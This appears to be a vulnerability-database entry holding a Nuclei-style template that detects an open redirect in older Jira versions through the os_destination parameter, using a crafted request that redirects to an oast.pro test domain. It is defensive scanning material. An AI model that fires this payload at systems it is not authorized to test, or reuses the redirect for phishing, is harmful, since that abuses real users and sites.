漏洞描述
Detected Open redirect vulnerability in Jira via os_destination parameter versions 5.2.11, 6.2, and 6.2.2.
jira-https-mode-open-redirect: JIRA in HTTPS mode - Open Redirect
PoC代码[已公开]
id: jira-https-mode-open-redirect
info:
name: JIRA in HTTPS mode - Open Redirect
author: 0x_Akoko
severity: medium
description: |
Detected Open redirect vulnerability in Jira via os_destination parameter versions 5.2.11, 6.2, and 6.2.2.
reference:
- https://jira.atlassian.com/browse/JRASERVER-38075
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N
cvss-score: 5.8
cwe-id: CWE-601
metadata:
verified: true
max-request: 1
tags: confluence,atlassian,jira,redirect,atlassian,vuln
http:
- method: GET
path:
- "{{BaseURL}}/ThisCanBeAnything?os_destination=%2F%2Foast.pro"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*)(?:https?://|//|/\\\\)?[a-zA-Z0-9._@-]*oast\.pro.*$'
- type: status
status:
- 302
# digest: 4a0a00473045022100da48ec9b8be56200daa7666baac206e31d4264dfb6b9aeb42c367fd281ddebb202200a2ca6a53bac5bf7e39dcf5f5cba9449a4380d77da482ce9fa27e0083198e911:922c64590222798bb761d5b6d8e72950